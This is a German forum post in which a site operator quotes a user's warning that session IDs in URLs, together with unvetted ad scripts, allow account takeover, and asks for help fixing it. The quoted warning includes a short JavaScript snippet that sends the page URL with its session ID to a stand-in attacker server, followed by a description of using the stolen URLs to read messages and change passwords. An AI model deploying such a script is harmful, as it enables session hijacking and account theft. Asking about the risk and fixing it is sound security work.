bei uns im Forum macht jemand die Pferde scheu und erzählt folgendes:
Was ist daran wahr? Was ist zu tun, um ein eventuelles Sicherheitsproblem abzustellen?Die SID in der Url ist definitiv ein Sicherheitsproblem. In Verbindung mit der unkontrollierten Werbung, die ihr hier schaltet, kann man ohne Weiteres Kundenkonten übernehmen. Soll ich dir ein Javascript bauen, mit dem ich die Loginurl abgreife? Dann schalte ich nur noch eine Werbeanzeige mit dem Script und warte, bis die hier geladen wird...
CODE: ALLES AUSWÄHLEN
<script type="text/javascript">
// url mit SID übernehmen
var urlMitSid = window.location.href;
// und jetzt zu meinem server schicken
$.ajax({
type: "POST",
url: "http://www.meinboeserbackend.de/forumshack",
data: urlMitSid
});
</script>
Jetzt brauche ich nur noch zu warten, bis die Urls bei mir ankommen und schön in der DB gespeichert werden. Die Links rufe ich nacheinander auf und lese PNs oder ändere Passwörter.
Nur weil man nicht weiß, wie man etwas fixt, heißt es nicht, dass ein Problem nicht existiert. Auch wenn die SID auf den Folgeseiten nicht mehr sichtbar ist, hilft dir nicht weiter. Einmal sichtbar in der URL reicht.
Danke für Eure Hilfe